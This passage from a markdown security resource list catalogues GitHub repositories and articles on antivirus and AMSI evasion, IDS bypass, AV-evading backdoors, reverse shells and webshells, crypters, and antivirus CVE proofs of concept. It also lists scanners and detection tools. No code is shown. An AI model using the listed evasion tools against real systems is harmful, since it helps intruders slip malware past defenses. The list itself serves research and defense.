arbitrary codes in memory to bypass common antivirus solutions - [**106**星][14d] [Shell] [jbreed/apkwash](https://github.com/jbreed/apkwash) Android APK Antivirus evasion for msfvenom generated payloads. - [**100**星][1y] [C] [kirillwow/ids_bypass](https://github.com/kirillwow/ids_bypass) 入侵检测系统(IDS)绕过PoC - [**100**星][4y] [Py] [ym2011/scanbackdoor](https://github.com/ym2011/scanbackdoor) Webshell扫描工具,通过各种规则和算法实现服务器脚本后门查杀 - [**99**星][29d] [Go] [asche910/flynet](https://github.com/asche910/flynet) A powerful TCP/UDP tool, which support socks5 proxy by tcp and udp, http proxy and NAT traversal. This tool can help you bypass gfw easily - [**89**星][11d] [Py] [k8gege/scrun](https://github.com/k8gege/scrun) BypassAV ShellCode Loader (Cobaltstrike/Metasploit) - [**85**星][1m] [Py] [llsourcell/antivirus_demo](https://github.com/llsourcell/antivirus_demo) Antivirus Demo for Fresh Machine Learning #7 - [**82**星][4y] [HTML] [vah13/avdetection](https://github.com/vah13/avdetection) A simple way for detection the remote user's antivirus - [**76**星][2m] [Go] [maliceio/malice-av](https://github.com/maliceio/malice-av) Malice AntiVirus Plugins - [**72**星][4y] [Py] [monnappa22/hollowfind](https://github.com/monnappa22/hollowfind) a Volatility plugin to detect different types of process hollowing techniques used in the wild to bypass, confuse, deflect and divert the forensic analysis techniques - [**71**星][5y] [Py] [robbyfux/ragpicker](https://github.com/robbyfux/ragpicker) Ragpicker is a Plugin based malware crawler with pre-analysis and reporting functionalities. Use this tool if you are testing antivirus products, collecting malware for another analyzer/zoo. - [**68**星][4m] [PHP] [marcocesarato/php-antimalware-scanner](https://github.com/marcocesarato/php-antimalware-scanner) AMWSCAN (Antimalware Scanner) is a php antimalware/antivirus scanner console script written in php for scan your project. This can work on php projects and a lot of others platform. - [**65**星][10d] [PHP] [thekingofduck/bypassavaddusers](https://github.com/thekingofduck/bypassavaddusers) 绕过杀毒软件添加用户 - [**64**星][6y] [Py] [andrew-morris/stupid_malware](https://github.com/andrew-morris/stupid_malware) Python malware for pentesters that bypasses most antivirus (signature and heuristics) and IPS using sheer stupidity - [**64**星][2m] [Py] [az0ne/python_backdoor](https://github.com/az0ne/python_backdoor) 过360主动防御360杀毒以前99%杀软的python后门 - [**63**星][17d] [C#] [two06/amsi_handler](https://github.com/two06/amsi_handler) Automate AV evasion by calling AMSI - [**60**星][4y] [Batchfile] [ayra/zipbomb](https://github.com/ayra/zipbomb) About an old technology that still screws up some anti virus software - [**59**星][5m] [JS] [evyatarmeged/humanoid](https://github.com/evyatarmeged/humanoid) Node.js package to bypass CloudFlare's anti-bot JavaScript challenges - [**56**星][3y] [Py] [ahm3dhany/ids-evasion](https://github.com/ahm3dhany/ids-evasion) Evading Snort Intrusion Detection System. - [**56**星][2y] [C++] [huoji120/av-killer](https://github.com/huoji120/av-killer) Antivirus Killer - [**56**星][14d] [C#] [damonmohammadbagher/nativepayload_reverseshell](https://github.com/damonmohammadbagher/nativepayload_reverseshell) This is Simple C# Source code to Bypass almost "all" AVS, (kaspersky v19, Eset v12 v13 ,Trend-Micro v16, Comodo & Windows Defender Bypassed via this method Very Simple) - [**52**星][2m] [C] [stonedreamforest/re_avkmgr](https://github.com/stonedreamforest/re_avkmgr) 逆向小红伞杀毒软件驱动——avkmgr - [**46**星][30d] [Shell] [jbreed/apkinjector](https://github.com/jbreed/apkinjector) Android APK Antivirus evasion for msfvenom generated payloads to inject into another APK file for phishing attacks. - [**45**星][1m] [Shell] [rordi/docker-antivirus](https://github.com/rordi/docker-antivirus) Docker antivirus & malware scanning (antivirus as a microservice / antivirus as a container) - [**44**星][9m] [HTML] [unk9vvn/andtroj](https://github.com/unk9vvn/andtroj) A tool for integrating the Metasploit payload with Android's healthy programs and bypassing antivirus - [**42**星][15d] [Py] [hackedteam/test-av2](https://github.com/hackedteam/test-av2) Automated antivirus test environment (new version) - [**42**星][4m] [C#] [ryuzakih/cloudflaresolverre](https://github.com/ryuzakih/cloudflaresolverre) Cloudflare Javascript & reCaptcha challenge (I'm Under Attack Mode or IUAM) solving / bypass .NET Standard library. - [**41**星][9y] [C++] [cr4sh/ptbypass-poc](https://github.com/cr4sh/ptbypass-poc) Bypassing code hooks detection in modern anti-rootkits via building faked PTE entries. - [**41**星][3m] [C++] [hackshields/antivirus](https://github.com/hackshields/antivirus) - [**41**星][4m] [C] [ntraiseharderror/antihook](https://github.com/ntraiseharderror/antihook) PoC designed to evade userland-hooking anti-virus. - [**40**星][25d] [PS] [curtbraz/invoke-neutralizeav](https://github.com/curtbraz/invoke-neutralizeav) Quick PoC I Wrote for Bypassing Next Gen AV Remotely for Pentesting - [**39**星][23d] [Py] [joxeankoret/tahh](https://github.com/joxeankoret/tahh) Source codes for "The Antivirus Hackers Handbook" book. - [**37**星][24d] [JS] [truework/lambda-s3-antivirus](https://github.com/truework/lambda-s3-antivirus) Lambda Function to scan incoming S3 uploads by Truework - [**36**星][15d] [Py] [hackedteam/test-av](https://github.com/hackedteam/test-av) Automated antivirus test environment - [**34**星][2y] [C#] [damonmohammadbagher/nativepayload_arp](https://github.com/damonmohammadbagher/nativepayload_arp) C# code for Transferring Backdoor Payloads by ARP Traffic and Bypassing Anti-viruses (Slow) - [**33**星][3y] [Shell] [b3rito/trolo](https://github.com/b3rito/trolo) trolo - an easy to use script for generating Payloads that bypasses antivirus - [**27**星][4m] [HTML] [rafaybaloch/sop-bypass-mini-test-suite](https://github.com/rafaybaloch/sop-bypass-mini-test-suite) This test suite contains over 40 different test cases that have proven to work with different mobile browsers in my research or testing Same Origin Policy bypass issues with browsers. Due credits were given to the researchers whose Proof of concepts have been incorporated in this test suite. Please note that, this is just the beta version, the n… - [**26**星][24d] [C] [devilogic/xvirus](https://github.com/devilogic/xvirus) 一个早期的抗启发式查杀的WIN32免杀壳 - [**26**星][10m] [C] [souhailhammou/panda-antivirus-lpe](https://github.com/souhailhammou/panda-antivirus-lpe) The exploit for Panda AV LPE - [**25**星][2y] [C#] [damonmohammadbagher/nativepayload_ip6dns](https://github.com/damonmohammadbagher/nativepayload_ip6dns) C# code for Transferring Backdoor Payloads by IPv6 Address (AAAA) records and DNS Traffic also Bypassing Anti-viruses - [**25**星][5m] [C] [visweswaran1998/cybergod-ksgmprh](https://github.com/visweswaran1998/cybergod-ksgmprh) An open-source antivirus for windows - [**24**星][2m] [PHP] [3xp10it/xwebshell](https://github.com/3xp10it/xwebshell) 免杀webshell集合 - [**23**星][4y] [Py] [d4vinci/anti_killer](https://github.com/d4vinci/anti_killer) Kill Any Antivirus Using Python For Windows Users . - [**23**星][7m] [C#] [lockfale/dotnetavbypass-master](https://github.com/lockfale/dotnetavbypass-master) C# AV bypass jank - [**21**星][2m] [C] [sanseolab/simpleavdriver](https://github.com/sanseolab/simpleavdriver) Simple AntiVirus Driver example - [**20**星][14d] [PHP] [pluginkollektiv/antivirus](https://github.com/pluginkollektiv/antivirus) Useful plugin that will scan your theme templates for malicious injections. Automatically. Every day. For more blog security. - [**20**星][17d] [ajayrandhawa/auto-screen-catpure](https://github.com/ajayrandhawa/Auto-Screen-Catpure) It is primary designed to be hidden and monitoring the computer activity. Take a screenshot of desktop in hidden mode using Visual C++ and save automatically to 'jpeg' file in every 30 second. 60+ Most Popular antivirus not detect this application while it is running on background. - [**19**星][25d] [C] [credativ/pg_snakeoil](https://github.com/credativ/pg_snakeoil) The PostgreSQL Antivirus #pgSnakeOil - [**18**星][6m] [C] [visweswaran1998/mrida](https://github.com/visweswaran1998/mrida) An opensource antivirus implementation - Successor of CyberGod KSGMPRH - [**17**星][13d] [HTML] [fmind/euphony](https://github.com/fmind/euphony) Harmonious Unification of Cacophonous Anti-Virus Vendor Labels for Android Malware - [**17**星][9m] [Java] [wh1t3p1g/monitorclient](https://github.com/wh1t3p1g/MonitorClient) 网站实时监控文件变动及webshell检测查杀工具 - [**15**星][4m] [PHP] [mahi2/befree](https://github.com/mahi2/befree) Website Security, Antivirus & Firewall || a powerful application that can secure your website against hackers, attacks and other incidents of abuse - [**15**星][3y] [payatu/quickheal](https://github.com/payatu/quickheal) CVE-2017-5005 for Quick Heal Antivirus - [**15**星][1m] [C] [stonedreamforest/re_avdevprot](https://github.com/stonedreamforest/re_avdevprot) 逆向小红伞杀毒软件驱动——avdevprot - [**15**星][12m] [PHP] [tengzhangchao/maskfindshell](https://github.com/tengzhangchao/maskfindshell) linux下webshell查杀工具 - [**15**星][3m] [C] [zzy590/basiclibpp](https://github.com/zzy590/basiclibpp) A powerful library for inline-hook,lock,compress etc,and it is useful for anti-virus software. - [**15**星][12d] [JS] [rubaljain/frida-jb-bypass](https://github.com/rubaljain/frida-jb-bypass) Frida script to bypass the iOS application Jailbreak Detection - [**12**星][1y] [Py] [huseck/scan_kill_php_shell](https://github.com/huseck/scan_kill_php_shell) 针对PHP网马的正则查杀 - [**12**星][16d] [Go] [malice-plugins/windows-defender](https://github.com/malice-plugins/windows-defender) Malice Windows Defender AntiVirus Plugin - [**12**星][2m] [C] [serializingme/emofishes](https://github.com/serializingme/emofishes) Emofishes is a collection of proof-of-concepts that help improve, bypass or detect virtualized execution environments (focusing on the ones setup for malware analysis). - [**11**星][2m] [behzadmagzer/epcrypter](https://github.com/behzadmagzer/epcrypter) A Tool For Crypt File And Bypass AntiVirus Even msfvenom Payloads - [**11**星][16d] [Py] [tanc7/dark-lord-obama](https://github.com/tanc7/dark-lord-obama) AV-evading Pythonic Reverse Shell with Dynamic Adaption Capabilities - [**10**星][2y] [C#] [arunvnnk/avbypass](https://github.com/arunvnnk/avbypass) Techniques that i have used to evade anti-virus during pen tests. - [**8**星][5y] [C++] [hkhk366/memory_codes_injection](https://github.com/hkhk366/memory_codes_injection) Inject codes to another process to watch and operate other process. This is usually used as anti-virus software. - [**8**星][6m] [Py] [nikhilraghava/ml-antivirus](https://github.com/nikhilraghava/ml-antivirus) An antivirus powered by machine learning. - [**8**星][1y] [Py] [xedtech/ceriumav](https://github.com/xedtech/ceriumav) Project Cerium Antivirus - [**8**星][3m] [C#] [fashionproof/uglyexe](https://github.com/fashionproof/uglyexe) UglyEXe - bypass some AVs - [**7**星][2m] [C] [idigitalflame/inyourmems](https://github.com/idigitalflame/inyourmems) Windows Antivirus Evasion and Memory Injection - [**7**星][2y] [zhiyuanwang-chengdu-qihoo360/malwarebytes_poc](https://github.com/zhiyuanwang-chengdu-qihoo360/malwarebytes_poc) Malwarebytes Antivirus CVE - [**7**星][7m] [JS] [ecstatic-nobel/not-anti-virus](https://github.com/ecstatic-nobel/not-anti-virus) An attmept to block malware before AV scans it. - [**6**星][10m] [Ruby] [duke-libraries/ddr-antivirus](https://github.com/duke-libraries/ddr-antivirus) Antivirus service wrapper - [**6**星][1y] [0x4xleakr/darkcrypter](https://github.com/0x4xleakr/darkcrypter) DarkCrypter encrypts your files and generates undetectable payloads to evade all anti-virus vendors. - [**5**星][2y] [Perl] [armadito/armadito-agent](https://github.com/armadito/armadito-agent) Armadito Agent for Antiviruses management - [**5**星][8m] [Py] [henriksb/virustotalscanner](https://github.com/henriksb/virustotalscanner) Scan suspicious applications with over 60 different anti-viruses with a mere two clicks and five seconds! - [**5**星][12m] [Go] [malice-plugins/kaspersky](https://github.com/malice-plugins/kaspersky) Malice Kaspersky Antivirus Plugin - [**4**星][3m] [Py] [technowlogy-pushpender/apkinfector](https://github.com/technowlogy-pushpender/apkinfector) Advanced Android AV Evasion Tool Written In Python 3 that can Embed/Bind meterpreter APK to any Legitimate APK - [**4**星][4m] [PHP] [guardiran/cloudhound](https://github.com/guardiran/cloudhound) CloudHound is a cloudflare bypass tool which is using several methods such as DNS history Checkup, Cross-Site port Attack and etc to detect original Server's IP - [**3**星][2y] [JS] [cranic/node-virus](https://github.com/cranic/node-virus) EICAR testing signature for anti-virus testing purpouses. - [**3**星][3m] [Java] [gabriellhuver/baafjava](https://github.com/gabriellhuver/baafjava) Metasploit powershell exec in java, bypass any antivirus. You can enter the url .txt powershell payload script, and the jar download and exec this on the victim pc. - [**3**星][1y] [Go] [malice-plugins/mcafee](https://github.com/malice-plugins/mcafee) Malice McAfee AntiVirus Plugin - [**3**星][2y] [HTML] [raikar/attack-docs](https://github.com/raikar/attack-docs) This repo contains comprehensive lists of attack payloads known to cause issues like OS command injection, directory listings, directory traversals, source exposure, file upload bypass, authentication bypass, http header crlf injections, and more - [**2**星][2y] [C++] [k0keoyo/vir.it-explorer-anti-virus-null-pointer-reference-poc](https://github.com/k0keoyo/vir.it-explorer-anti-virus-null-pointer-reference-poc) - [**2**星][2y] [kernelm0de/cve-2018-8090](https://github.com/kernelm0de/cve-2018-8090) DLL Hijacking in Quickheal Total Security/ Internet Security/ Antivirus Pro (Installers) - [**2**星][5m] [Py] [mado-95/madcrypt](https://github.com/mado-95/madcrypt) Simple script that strips/compresses/signs any PE in an effort to lower antivirus detection ratio. - [**2**星][3m] [rubyfly/k7antivirus_poc](https://github.com/rubyfly/k7antivirus_poc) K7AntiVirus_POC - [**2**星][2y] [C] [sqdwr/deletefilebycreateirp](https://github.com/sqdwr/deletefilebycreateirp) 通过创建Irp删除文件,代码抄袭自某杀毒软件*86部分,因此可以看到IDA痕迹 - [**2**星][2y] [zhiyuanwang-chengdu-qihoo360/escanav_poc](https://github.com/zhiyuanwang-chengdu-qihoo360/escanav_poc) escanAntivirus CVE - [**2**星][2y] [zhiyuanwang-chengdu-qihoo360/k7_antivirus_poc](https://github.com/zhiyuanwang-chengdu-qihoo360/k7_antivirus_poc) K7 Antivirus CVE - [**1**星][7y] [Py] [daveclowe/mcbup](https://github.com/daveclowe/mcbup) Python script which converts McAfee quarantine files back to their native format, generates an MD5 hash, and queries the VirusTotal API for antivirus scan results. - [**1**星][2y] [Java] [pnfsoftware/jeb2-plugin-avqu](https://github.com/pnfsoftware/jeb2-plugin-avqu) JEB Plugin Extractor for Anti-Virus Quarantine files - [**1**星][3y] [Java] [sanjeet990/android-antivirus-project](https://github.com/sanjeet990/android-antivirus-project) This is an Antivirus project for Android that I created for my college project. - [**1**星][4y] [Java] [sushanthikshwaku/antiv](https://github.com/sushanthikshwaku/antiv) Anti virus app for android using VirusTotal - [**1**星][2y] [zhiyuanwang-chengdu-qihoo360/jiangmin_antivirus_poc](https://github.com/zhiyuanwang-chengdu-qihoo360/jiangmin_antivirus_poc) Jiangmin_Antivirus_CVE - [**1**星][2y] [zhiyuanwang-chengdu-qihoo360/maxsecureantivirus_poc](https://github.com/zhiyuanwang-chengdu-qihoo360/maxsecureantivirus_poc) MaxSecureAntivirus CVE - [**1**星][2y] [zhiyuanwang-chengdu-qihoo360/nprotectantivirus_poc](https://github.com/zhiyuanwang-chengdu-qihoo360/nprotectantivirus_poc) nProtectAntivirus_CVE - [**1**星][2y] [zhiyuanwang-chengdu-qihoo360/zillyaantivirus_poc](https://github.com/zhiyuanwang-chengdu-qihoo360/zillyaantivirus_poc) ZillyaAntivirusCVE - [**0**星][2y] [d0nemkj/poc_bsod](https://github.com/d0nemkj/poc_bsod) Antivirus software's BSOD poc - [**0**星][2y] [C++] [mmmxny/k7-antivirus](https://github.com/mmmxny/k7-antivirus) - [**0**星][2y] [eonrickity/cve-2017-0213](https://github.com/eonrickity/CVE-2017-0213) Fixed No Virus Manual Automatic Loader exe no zip because zip picks up the anti virus detector. - [**0**星][4m] [Py] [giacomoferro/antivirus-detection-analysis](https://github.com/giacomoferro/antivirus-detection-analysis) Software Security project - Malware Detection Analysis A.A. 2019/2020. - [**None**星][C#] [med0x2e/noamci](https://github.com/med0x2e/noamci) Using DInvoke to patch AMSI.dll in order to bypass AMSI detections triggered when loading .NET tradecraft via Assembly.Load(). - [**None**星][hack2fun/bypassav](https://github.com/hack2fun/bypassav) Cobalt Strike插件,用于快速生成免杀的可执行文件 - [**None**星][C] [reddyyz/ghostshell](https://github.com/reddyyz/ghostshell) Malware indetectable, with AV bypass techniques, anti-disassembly, etc. # <a id="43ab3b50407757fdb5a2b9cb2c3e4cad"></a>文章 *** ## <a id="eb021f60cbd17bdf75a241a68fa0986e"></a>新添加 - 2020.05 [eforensicsmag] [Simple Techniques to Bypass AVs | By Siddharth Sharma](https://eforensicsmag.com/simple-techniques-to-bypass-avs-by-siddharth-sharma/) - 2020.05 [secplicity] [MedusaLocker Ransomware Will Bypass Most Antivirus Software](https://www.secplicity.org/2020/05/19/medusalocker-ransomware-will-bypass-most-antivirus-software/) - 2020.04 [t00ls] [CobaltStrike Powershell Bypass AV 初探](https://www.t00ls.net/articles-55754.html) - 2020.03 [kitploit] [Oce Colorwave 500 CSRF / XSS / Authentication Bypass](https://exploit.kitploit.com/2020/03/oce-colorwave-500-csrf-xss.html) - 2020.03 [zerodayinitiative] [Trend Micro Worry-Free Business Security Directory Traversal Authentication Bypass Vulnerability](https://www.zerodayinitiative.com/advisories/ZDI-20-307/) - 2020.03 [freebuf] [关于分段免杀执行的思考](https://www.freebuf.com/articles/web/228579.html) - 2020.03 [hakin9] [Xencrypt - A PowerShell script anti-virus evasion tool](https://hakin9.org/xencrypt-a-powershell-script-anti-virus-evasion-tool/) - 2020.02 [markmotig] [UglyEXe — bypass some AVs](https://medium.com/p/4a10313277aa) - 2020.02 [aliyun] [那些shellcode免杀总结](https://xz.aliyun.com/t/7170) - 2020.02 [virtuesecurity] [Evading Antivirus with Better Meterpreter Payloads](https://www.virtuesecurity.com/evading-antivirus-with-better-meterpreter-payloads/) - 2020.01 [ionize] [Detecting AMSI Bypass](https://ionize.com.au/detecting-amsi-bypass/) - 2019.12 [aliyun] [shellcode加密过杀软](https://xz.aliyun.com/t/6995) - 2019.12 [andrea] [Bypass Win AV and Firewall with powershell code](https://www.peerlyst.com/posts/bypass-win-av-and-firewall-with-powershell-code-andrea-bocchetti-1) - 2019.12 [LoiLiangYang] [Evade Detection with Auto Process Migration on Shell Exploit (Cybersecurity)](https://www.youtube.com/watch?v=7xAjLQCJxuU) - 2019.12 [sarang6489] [Root Detection Bypass With Frida.](https://medium.com/p/4a78ad075d09) - 2019.12 [trendmicro] [Waterbear is Back, Uses API Hooking to Evade Security Product Detection](https://blog.trendmicro.com/trendlabs-security-intelligence/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection/) - 2019.12 [sarang6489] [Root Detection Bypass By Manual Code Manipulation.](https://medium.com/p/5478858f4ad1) - 2019.11 [eforensicsmag] [Bypassing AVs by C# Managed Code (Reverse Shell) | By Damon Mohammadbagher](https://eforensicsmag.com/bypassing-avs-by-c-managed-code-reverse-shell-by-damon-mohammadbagher/) - 2019.11 [deepsec] [ROOTS 2019 Talk: Shallow Security: on the Creation of Adversarial Variants to Evade ML-Based Malware Detectors – Fabricio Ceschin](https://blog.deepsec.net/roots-2019-talk-shallow-security-on-the-creation-of-adversarial-variants-to-evade-ml-based-malware-detectors-fabricio-ceschin/) - 2019.11 [two06] [AMSI as a Service — Automating AV Evasion](https://medium.com/p/2e2f54397ff9) - 2019.11 [dodgethissecurity] [Hancitor. Evasive new waves, and how COM objects can use Cached Credentials for Proxy Authentication.](https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/) - 2019.10 [trustedsec] [Discovering the Anti-Virus Signature and Bypassing It](https://www.trustedsec.com/blog/discovering-the-anti-virus-signature-and-bypassing-it/) - 2019.10 [vmray] [[Risky Business Podcast] 3 Approaches that Evade Static Machine Learning Detection](https://www.vmray.com/cyber-security-blog/risky-business-podcast-3-approaches-evade-static-machine-learning-detection/) - 2019.09 [carbonblack] [CB TAU Threat Intelligence Notification: Qbot/Qakbot Attempts to Evade Detection By Overwriting Itself](https://www.carbonblack.com/2019/09/26/cb-tau-threat-intelligence-notification-qbot-qakbot-attempts-to-evade-detection-by-overwriting-itself/) - 2019.09 [aliyun] [使用C#编写自定义后门负载》学习笔记及免杀尝试](https://xz.aliyun.com/t/6222) - 2019.07 [freebuf] [安全视角下的木马免杀技术讨论](https://www.freebuf.com/articles/system/209652.html) - 2019.07 [aliyun] [MSF利用python反弹shell-Bypass AV](https://xz.aliyun.com/t/5657) - 2019.06 [bugbountywriteup] [Antivirus Evasion with Python](https://medium.com/p/49185295caf1) - 2019.05 [arxiv] [[1905.13409] Bypassing Backdoor Detection Algorithms in Deep Learning](https://arxiv.org/abs/1905.13409) - 2019.05 [benoit] [PowerShell AV evasion](https://medium.com/p/4e4bb6a6a961) - 2019.05 [4hou] [绕过杀软:通过网络接收ShellCode的无文件攻击方式与检测方法](https://www.4hou.com/technology/16845.html) - 2019.05 [freebuf] [绕过杀软!SQL Server Transact-SQL 的无文件攻击姿势](https://www.freebuf.com/articles/system/202871.html) - 2019.05 [4hou] [绕过杀软!SQL Server Transact-SQL的无文件攻击姿势](https://www.4hou.com/system/17896.html) - 2019.05 [freebuf] [零杀软检出,我国遭到“海莲花”新手法攻击](https://www.freebuf.com/articles/network/201836.html) - 2019.04 [threatbook] [【微步在线报告】零杀软检出,我国遭到“海莲花”新手法攻击](https://x.threatbook.cn/nodev4/vb4/article?threatInfoID=1397) - 2019.04 [astr0baby] [Metasploit payloads evasion against Linux AV](https://astr0baby.wordpress.com/2019/04/23/metasploit-payloads-evasion-against-linux-av/) - 2019.04 [fbotes2] [Advance AV Evasion Symantec and P4wnP1 USB](https://medium.com/p/c7899bcbc6af) - 2019.04 [crowdstrike] [Mimikatz in the Wild: Bypassing Signature-Based Detections Using the “AK47 of Cyber”](https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/) - 2019.03 [f5] [How Malware Evades Detection](https://devcentral.f5.com/articles/how-malware-evades-detection-34025) - 2019.03 [govolution] [Antivirus Evasion on OSX](https://danielsauder.com/2019/03/21/antivirus-evasion-on-osx/) - 2019.03 [0x00sec] [[FUN] Bypass XSS Detection WAF](https://0x00sec.org/t/fun-bypass-xss-detection-waf/12228/) - 2019.03 [yoroi] [Evading AV with JavaScript Obfuscation](https://blog.yoroi.company/research/evading-av-with-javascript-obfuscation/) - 2019.03 [bromium] [Tricks and COMfoolery: How Ursnif Evades Detection](https://www.bromium.com/how-ursnif-evades-detection/) - 2019.02 [aliyun] [渗透利器Cobalt Strike - 第2篇 APT级的全面免杀与企业纵深防御体系的对抗](https://xz.aliyun.com/t/4191) - 2019.02 [4hou] [使用Cobalt Strike和Gargoyle绕过杀软的内存扫描](http://www.4hou.com/binary/16203.html) - 2019.02 [aliyun] [Bypass AVs to Add Users](https://xz.aliyun.com/t/4078) - 2019.02 [cybereason] [The Newest Variant of the Astaroth Trojan Evades Detection in the Sneakiest Way](https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil) - 2019.02 [aliyun] [从静态到动态打造一款免杀的antSword(蚁剑)](https://xz.aliyun.com/t/4000) - 2019.01 [paloaltonetworks] [Malware Used by “Rocke” Group Evolves to Evade Detection by Cloud Security](https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/) - 2019.01 [0x00sec] [Bypassing Crowdstrike Falcon detection, from phishing email to reverse shell](https://0x00sec.org/t/bypassing-crowdstrike-falcon-detection-from-phishing-email-to-reverse-shell/10802/) - 2019.01 [lookout] [Lookout researchers disable Android malware designed to evade detection](https://blog.lookout.com/dresscode) - 2019.01 [t00ls] [投稿文章:Bypass Applocker + 免杀执行任意 shellcode [ csc + installUtil ]](https://www.t00ls.net/articles-49443.html) - 2019.01 [proofpoint] [Phishing template uses fake fonts to decode content and evade detection](https://www.proofpoint.com/us/threat-insight/post/phishing-template-uses-fake-fonts-decode-content-and-evade-detection) - 2019.01 [abend] [Bypassing anti virus using powershell](https://www.slideshare.net/abend_cve_9999_0001/bypassing-anti-virus-using-powershell) - 2018.12 [cyberarms] [AV & AMSI Bypass with Magic Unicorn](https://cyberarms.wordpress.com/2018/12/27/av-amsi-bypass-with-magic-unicorn/) - 2018.11 [0x00sec] [New AV Bypass techniques](https://0x00sec.org/t/new-av-bypass-techniques/9608/) - 2018.10 [360] [老树开新花:利用Excel 4.0宏躲避杀软检测的攻击技术分析](https://www.anquanke.com/post/id/163000/) - 2018.10 [checkpoint] [How To Detect LibSSH Authentication Bypass for EC2 Instances | Check Point Software Blog](https://blog.checkpoint.com/2018/10/22/detect-libssh-authentication-bypass-ec2-instances/) - 2018.10 [aliyun] [深入了解Metasploit框架的AV免杀新功能](https://xz.aliyun.com/t/2888) - 2018.10 [rapid7] [Metasploit's First Antivirus Evasion Modules: Evading AV Detection](https://blog.rapid7.com/2018/10/09/introducing-metasploits-first-evasion-module/) - 2018.10 [reversinglabs] [eWeek: Cisco Talos and ReversingLabs warn that the Adwind Remote Access Trojan (RAT) has added capabilities that enable it bypass some anti-virus technologies](https://www.reversinglabs.com/newsroom/news/eweek-cisco-talos-and-reversinglabs-warn-adwind-remote-access-trojan-rat-has-added.html) - 2018.09 [aliyun] [攻击者是如何利用Delphi加壳器来实现免杀的](https://xz.aliyun.com/t/2785) - 2018.09 [360] [利用Office公式编辑器特殊处理逻辑的免杀技术分析(CVE-2017-11882)](https://www.anquanke.com/post/id/159306/) - 2018.09 [venus] [利用了Office公式编辑器特殊处理逻辑的最新免杀技术分析(CVE-2017-11882)](https://paper.seebug.org/699/) - 2018.09 [DoktorCranium] [Bypassing latest Avast AV on Windows 10 x86_64](https://www.youtube.com/watch?v=yeSIsbYJ3gc) - 2018.09 [astr0baby] [Bypassing latest Avast AV on Windows 10 x86_64](https://astr0baby.wordpress.com/2018/09/05/bypassing-latest-avast-av-on-windows-10-x86_64/) - 2018.09 [arxiv] [[1809.00615] Have You Stolen My Model? Evasion Attacks Against Deep Neural Network Watermarking Techniques](https://arxiv.org/abs/1809.00615) - 2018.08 [alienvault] [Antivirus Evasion for Penetration Testing Engagements](https://www.alienvault.com/blogs/security-essentials/antivirus-evasion-for-penetration-testing-engagements) - 2018.08 [arxiv] [[1808.04218] Android HIV: A Study of Repackaging Malware for Evading Machine-Learning Detection](https://arxiv.org/abs/1808.04218) - 2018.08 [radware] [Drive-By Cryptomining: Another Way Cyber-Criminals Are Trying to Evade Detection](https://blog.radware.com/security/2018/08/drive-by-cryptomining/) - 2018.07 [aliyun] [通过操控MIME让病毒邮件五步轻松过杀软](https://xz.aliyun.com/t/2430) - 2018.06 [360] [win10内存执行meterpreter绕过杀软第二弹](https://www.anquanke.com/post/id/148340/) - 2018.06 [freebuf] [技术讨论 | NjRAT通过base64编码加密混淆Code免杀绕过360杀毒实验](http://www.freebuf.com/articles/rookie/174776.html) - 2018.06 [injection] [OSCP Journey Part 15.0 (Bettercap, Merlin, and 1000 subs!/MitM+AV Evasion)](https://www.youtube.com/watch?v=ovsudFgvxYo) - 2018.06 [n00py] [Executing Meterpreter in Memory on Windows 10 and Bypassing AntiVirus (Part 2)](https://www.n00py.io/2018/06/executing-meterpreter-in-memory-on-windows-10-and-bypassing-antivirus-part-2/) - 2018.06 [freebuf] [技术讨论 | Windows 10进程镂空技术(木马免杀)](http://www.freebuf.com/articles/system/173532.html) - 2018.06 [n00py] [在内存中执行Meterpreter并绕过AV(Win10)](https://www.n00py.io/2018/06/executing-meterpreter-in-memory-on-windows-10-and-bypassing-antivirus/) - 2018.05 [aliyun] [构造免杀的asp一句话木马](https://xz.aliyun.com/t/2356) - 2018.05 [ironcastle] [Antivirus Evasion? Easy as 1,2,3, (Fri, May 25th)](https://www.ironcastle.net/antivirus-evasion-easy-as-123-fri-may-25th/) - 2018.05 [sans] [Antivirus Evasion? Easy as 1,2,3](https://isc.sans.edu/forums/diary/Antivirus+Evasion+Easy+as+123/23701/) - 2018.04 [trendmicro] [僵尸软件Necurs利用互联网快捷方式文件(Internet Shortcut File)躲避垃圾邮件检测(TrendMicro)](https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/) - 2018.04 [freebuf] [利用DiskShadow服务实现免杀持久化控制以及活动目录数据库提取](http://www.freebuf.com/articles/system/168115.html) - 2018.04 [freebuf] [Metasploit的简单木马免杀技术及后渗透面临的问题](http://www.freebuf.com/sectool/166682.html) - 2018.03 [freebuf] [利用了多种Office OLE特性的免杀样本分析及溯源](http://www.freebuf.com/news/166056.html) - 2018.03 [360] [利用了多种Office OLE特性的免杀样本分析及溯源](https://www.anquanke.com/post/id/101722/) - 2018.03 [tan6600] [木马核心技术剖析读书笔记之木马免杀](https://blog.csdn.net/tan6600/article/details/79586423) - 2018.03 [arxiv] [[1803.04173] Adversarial Malware Binaries: Evading Deep Learning for Malware Detection in Executables](https://arxiv.org/abs/1803.04173) - 2018.03 [crowdstrike] [Too Accessible: How CrowdStrike Falcon Detects and Prevents Windows Logon Bypasses](https://www.crowdstrike.com/blog/accessible-crowdstrike-falcon-detects-prevents-windows-logon-bypasses/) - 2018.03 [infosecinstitute] [Android Root Detection Bypass by Reverse Engineering APK](http://resources.infosecinstitute.com/android-root-detection-bypass-reverse-engineering-apk/) - 2018.03 [freebuf] [经验分享 | 一句话免杀编写思路](http://www.freebuf.com/articles/system/164076.html) - 2018.02 [marcoramilli] [Control Flow Integrity: a Javascript Evasion Technique](https://marcoramilli.blogspot.com/2018/02/control-flow-integrity-javascript.html) - 2018.01 [trustedsec] [Very high level of confidence’ Russia used Kaspersky software for devastating NSA leaks, Featuring David Kennedy – Yahoo Finance](https://www.trustedsec.com/2018/01/high-level-confidence-russia-used-kaspersky-software-devastating-nsa-leaks-featuring-david-kennedy-yahoo-finance/) - 2018.01 [pentesttoolz] [How to Create Undetectable Python Payloads that Bypass Antiviruses – Kali Linux 2017.3](https://pentesttoolz.com/2018/01/12/how-to-create-undetectable-python-payloads-that-bypass-antiviruses-kali-linux-2017-3/) - 2018.01 [digitalforensicstips] [Ghostwriting for Antivirus Evasion in 